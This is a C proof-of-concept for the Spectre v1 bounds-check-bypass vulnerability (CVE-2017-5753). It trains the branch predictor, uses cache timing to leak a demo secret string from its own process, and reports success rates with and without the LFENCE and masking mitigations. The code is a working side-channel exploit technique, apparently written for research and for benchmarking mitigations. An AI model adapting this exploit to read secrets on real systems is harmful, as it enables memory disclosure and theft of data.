/* spectre.c - CVE-2017-5753 user-to-user success rate measurement
*
* Borrows code from
* - https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9e3d4bb6
* - https://github.com/genua/meltdown
*
* Copyright (c) 2022 Samuel AUBERTIN
*
* Permission to use, copy, modify, and distribute this software for any
* purpose with or without fee is hereby granted, provided that the above
* copyright notice and this permission notice appear in all copies.
*
* THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
* WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
* ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
* WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
* ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
* OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <getopt.h>
#include <string.h>
#include <x86intrin.h> /* for rdtscp and clflush */
#if defined(__i386__) || defined(__amd64__)
#define CACHELINE_SIZE 64
#else
#error "unsupported architecture"
#endif
#if defined(__SSE__) && !defined(__SSE2__)
#define NOSSE2
#endif
#ifdef NOSSE2
#define NORDTSCP
#define NOMFENCE
#define NOCLFLUSH
#endif //NOSSE2
#ifndef NORDTSCP
#define LATENCY (42 + 42)
#else
#ifndef NOMFENCE
#define LATENCY (18 + 18)
#else
#define LATENCY 0 /* no usable fence or rdtscp: assume no timer overhead */
#endif
#endif
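/* LATENCY approximates the overhead, in cycles, of the two timer reads
 * themselves (presumably ~42 each for rdtscp, ~18 each for the fenced
 * rdtsc path). timed_access() subtracts it and calibrate_threshold() adds
 * it back, so both sides of the hit comparison shift consistently. */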
#ifdef MASKING_MITIGATION
/* From https://github.com/torvalds/linux/blob/cb6416592bc2a8b731dabcec0d63cda270764fc6/arch/x86/include/asm/barrier.h#L27
*
* array_index_mask_nospec() - generate a mask that is ~0UL when the
* bounds check succeeds and 0 otherwise
* @index: array element index
* @size: number of elements in array
*
* Returns:
* 0 - (index < size)
*/
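/* Worked example, assuming size = 16: index = 5 makes "cmp" borrow
 * (CF = 1), so "sbb mask,mask" yields ~0UL; index = 20 clears the borrow
 * and yields 0. ANDing the index with the mask clamps out-of-bounds
 * indices to 0 without a conditional branch the CPU could speculate past. */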
static inline unsigned long
array_index_mask_nospec(
unsigned long index,
unsigned long size
)
{
unsigned long mask;
__asm__ __volatile__ ("cmp %1,%2; sbb %0,%0;"
:"=r" (mask)
:"g"(size),"r" (index)
:"cc");
return mask;
}
#endif //MASKING_MITIGATION
#ifdef NOCLFLUSH
#define CACHE_FLUSH_ITERATIONS 2048
#define CACHE_FLUSH_STRIDE 4096
uint8_t cache_flush_array[CACHE_FLUSH_STRIDE * CACHE_FLUSH_ITERATIONS];
/* Flush memory using long SSE instructions */
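/* (Assumed intent: _mm_stream_ps issues a non-temporal 16-byte store that
 * bypasses the cache hierarchy and invalidates any cached copy of the line.
 * The 4x4 loop below issues 16 such stores, covering 256 bytes, i.e. four
 * 64-byte cache lines starting at addr.) */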
void
flush_memory_sse(
uint8_t * addr
)
{
float * p = (float *)addr;
float c = 0.f;
__m128 i = _mm_setr_ps(c, c, c, c);
int k, l;
/* Non-sequential memory addressing by looping through k by l */
for (k = 0; k < 4; k++)
for (l = 0; l < 4; l++)
_mm_stream_ps(&p[(l * 4 + k) * 4], i);
}
#endif //NOCLFLUSH
char* secret = "SPECTRE: Special Executive for Counterintelligence, Terrorism, Revenge and Extortion.";
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
uint8_t unused2[64];
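/* Probe array: one 512-byte slot per possible byte value. The stride keeps
 * each slot on its own cache line, spaced widely enough that hardware
 * prefetching of neighbouring lines should not fake a hit. */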
uint8_t array2[256 * 512];
uint8_t temp = 0; /* Used so compiler won't optimize out victim_function() */
unsigned cache_hit_threshold;
static inline unsigned
timed_access(
volatile uint8_t *addr
)
{
uint64_t t0, t1;
#pragma GCC diagnostic ignored "-Wuninitialized"
unsigned int junk = junk;
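/* junk is deliberately self-initialized (the pragma above silences the
 * warning); folding *addr into it keeps the compiler from optimizing the
 * timed load away. */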
#ifndef NORDTSCP
t0 = __rdtscp(& junk);
junk |= *addr;
t1 = __rdtscp(& junk);
#else
#ifndef NOMFENCE
/*
Since the rdtsc instruction isn't serialized, newer processors will try to
reorder it, ruining its value as a timing mechanism.
To get around this, we use the mfence instruction to introduce a memory
barrier and force serialization. mfence is used because it is portable across
Intel and AMD.
*/
_mm_mfence();
t0 = __rdtsc();
_mm_mfence();
junk = * addr;
_mm_mfence();
t1 = __rdtsc();
_mm_mfence();
#else
/*
The mfence instruction was introduced with the SSE2 instruction set, so
we have to ifdef it out on pre-SSE2 processors.
Luckily, these older processors don't seem to reorder the rdtsc instruction,
so not having mfence on older processors is less of an issue.
*/
t0 = __rdtsc();
junk |= *addr;
t1 = __rdtsc();
#endif // NOMFENCE
#endif // NORDTSCP
return (unsigned)(t1 - t0 - LATENCY);
}
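/*
 * Estimate the cache-hit threshold: bufp is aligned to a cache line inside
 * buf, touched once so the line is resident, then timed cnt times. The
 * average hit latency, with the timer overhead (LATENCY) added back,
 * becomes the threshold separating cached from uncached reads.
 */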
static void
calibrate_threshold(
unsigned int *threshold
)
{
volatile char buf[2 * CACHELINE_SIZE];
volatile uint8_t *bufp;
int i;
const int cnt = 10000;
uint64_t tcache = 0;
__attribute__((unused))
volatile int junk = 0;
bufp = ((volatile void *)(((unsigned long)(buf) + CACHELINE_SIZE) &
~(CACHELINE_SIZE - 1)));
junk |= *bufp;
for (i = 0, tcache = 0; i < cnt; i++) {
tcache += timed_access(bufp);
}
tcache = tcache / cnt;
if (threshold != NULL) {
*threshold = tcache + LATENCY;
}
return;
}
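/*
 * The Spectre v1 gadget. With training, the branch predictor learns that
 * the bounds check passes; a subsequent out-of-bounds x is then used
 * speculatively to index array1, and the byte read there selects which
 * 512-byte slot of array2 is pulled into the cache.
 */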
void
victim_function(
size_t x
)
{
if (x < array1_size) {
#ifdef LFENCE_MITIGATION
/*
* According to Intel et al, the best way to mitigate this is to
* add a serializing instruction after the boundary check to force
* the retirement of previous instructions before proceeding to
* the read.
* See https://newsroom.intel.com/wp-content/uploads/sites/11/2018/01/Intel-Analysis-of-Speculative-Execution-Side-Channels.pdf
*/
_mm_lfence();
#endif
#ifdef MASKING_MITIGATION
x &= array_index_mask_nospec(x, array1_size);
#endif
temp &= array2[array1[x] * 512];
}
}
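/*
 * Attempt to leak the byte at array1[malicious_x]. Each try flushes the
 * probe array, interleaves five training calls to victim_function() with
 * one malicious call, then times all 256 probe slots in a mixed order;
 * the slot that became cached reveals the speculated byte. The best
 * candidate and its tally are returned through value[0] and score[0].
 */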
void
leak(
size_t malicious_x,
uint8_t value[2],
int score[2],
unsigned cache_hit_threshold
)
{
static int results[256];
int tries, i, j, mix_i;
unsigned int junk = 0;
size_t training_x, x;
volatile uint8_t *addr;
#ifdef NOCLFLUSH
int junk2 = 0;
int l;
(void)junk2;
#endif
for (i = 0; i < 256; i++) {
results[i] = 0;
}
for (tries = 999; tries > 0; tries--) {
#ifndef NOCLFLUSH
/* Flush array2[256*(0..255)] from cache */
for (i = 0; i < 256; i++)
_mm_clflush(&array2[i * 512]);
#else
/* Flush array2[256*(0..255)] from cache
using long SSE instruction several times */
for (j = 0; j < 16; j++) {
for (i = 0; i < 256; i++) {
flush_memory_sse( & array2[i * 512]);
}
}
#endif
/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
training_x = tries % array1_size;
for (j = 29; j >= 0; j--) {
#ifndef NOCLFLUSH
_mm_clflush(&array1_size);
#else
/* Alternative to using clflush to flush the CPU cache
* Read addresses at 4096-byte intervals out of a large array.
* Do this around 2000 times, or more depending on CPU cache size. */
for(l = CACHE_FLUSH_ITERATIONS * CACHE_FLUSH_STRIDE - 1; l >= 0; l-= CACHE_FLUSH_STRIDE) {
junk2 = cache_flush_array[l];
}
#endif
for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
/* Avoid jumps in case those tip off the branch predictor */
x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
x = (x | (x >> 16)); /* Set x=-1 if j%6==0, else x=0 */
x = training_x ^ (x & (malicious_x ^ training_x));
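/* Worked example: when j % 6 == 0, (j % 6) - 1 is -1, so the mask
 * becomes 0xFFFF0000 (sign-extended into size_t); OR-ing in its own
 * 16-bit right shift smears it to all ones and x becomes malicious_x.
 * For any other j, the mask is 0 and x stays training_x. */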
/* Call the victim! */
victim_function(x);
}
/* Time reads. Order is lightly mixed up to prevent stride prediction */
for (i = 0; i < 256; i++) {
mix_i = ((i * 167) + 13) & 255;
addr = & array2[mix_i * 512];
if (timed_access(addr) <= cache_hit_threshold && mix_i != array1[tries % array1_size])
results[mix_i]++; /* cache hit - add +1 to score for this value */
}
/* Locate the highest tally in j */
j = -1;
for (i = 0; i < 256; i++) {
if (j < 0 || results[i] >= results[j]) {
j = i;
}
}
if (results[j] >= 3)
break;
}
results[0] ^= junk; /* use junk so code above won't get optimized out */
value[0] = (uint8_t) j;
score[0] = results[j];
}
int
main(
int argc,
char** argv
)
{
int o;
size_t malicious_x = (size_t)(secret - (char * ) array1); /* default for malicious_x */
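/* The default malicious index is the distance from array1 to the secret
 * string, so the speculative read array1[malicious_x] lands on the
 * secret's bytes. */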
int i, score[2], len = (int)strlen(secret);
uint8_t value[2];
unsigned successes = 0;
int json = 0;
while ((o = getopt(argc, argv, "t:j")) != EOF) {
switch (o) {
case 't':
cache_hit_threshold = atoi(optarg);
break;
case 'j':
json++;
break;
default:
usage:
fprintf(stderr, "usage: %s [-j] "
"[-t threshold]\n"
"\t-j\t\tJSON output\n"
"\t-t INT\t\tfixed threshold\n", argv[0]);
return 1;
}
}
if (argc != optind)
goto usage;
fprintf(stderr, "[+] %s leaking %d bytes with CVE-2017-5753:\n[?] ",
argv[0] + 2,
(int)strlen(secret));
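/* Calibration always runs; the measured threshold is stored only when no
 * -t override was given (a NULL argument discards the result). */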
calibrate_threshold(cache_hit_threshold ? NULL : &cache_hit_threshold);
#ifdef NOCLFLUSH
for (i = 0; i < (int)sizeof(cache_flush_array); i++) {
cache_flush_array[i] = 1;
}
#endif
for (i = 0; i < (int)sizeof(array2); i++)
array2[i] = 1; /* write to array2 so it is in RAM, not copy-on-write zero pages */
while (--len >= 0) {
leak(malicious_x++, value, score, cache_hit_threshold);
if(score[0] == 3 && value[0] > 31 && value[0] < 127) {
successes++;
fprintf(stderr, "\033[32m%c\033[0m", (value[0]));
} else {
fprintf(stderr, "\033[31m?\033[0m");
}
}
fprintf(stderr, "\n");
if (json) {
printf("{ \"%s\": { \"capacities\": { ",argv[0] + 2);
#ifndef NORDTSCP
printf("\"rdtscp\": true, ");
#else
printf("\"rdtscp\": false, ");
#endif
#ifndef NOMFENCE
printf("\"mfence\": true, ");
#else
printf("\"mfence\": false, ");
#endif
#ifndef NOCLFLUSH
printf("\"clflush\": true ");
#else
printf("\"clflush\": false ");
#endif
printf("}, \"mitigations\": { ");
#ifdef LFENCE_MITIGATION
printf("\"lfence\": true, ");
#else
printf("\"lfence\": false, ");
#endif
#ifdef MASKING_MITIGATION
printf("\"masking\": true ");
#else
printf("\"masking\": false ");
#endif
printf("}, ");
printf("\"threshold\": %d, ", cache_hit_threshold);
printf("\"success\": %.0f } }",
100 * successes / (float)strlen(secret));
}
fprintf(stderr, "[+] %-27s\t",argv[0] + 2);
#ifndef NORDTSCP
fprintf(stderr, "RDTSCP ");
#else
fprintf(stderr, "RDTSC ");
#endif
#ifndef NOMFENCE
fprintf(stderr, "MFENCE ");
#endif
#ifndef NOCLFLUSH
fprintf(stderr, "CLFLUSH ");
#endif
#ifdef LFENCE_MITIGATION
fprintf(stderr, "LFENCE_MITIGATION ");
#endif
#ifdef MASKING_MITIGATION
fprintf(stderr, "MASKING_MITIGATION ");
#endif
fprintf(stderr, "\tthreshold %-3d\tsuccess %3.0f %%\n",
cache_hit_threshold,
100 * successes / (float)strlen(secret));
return 0;
}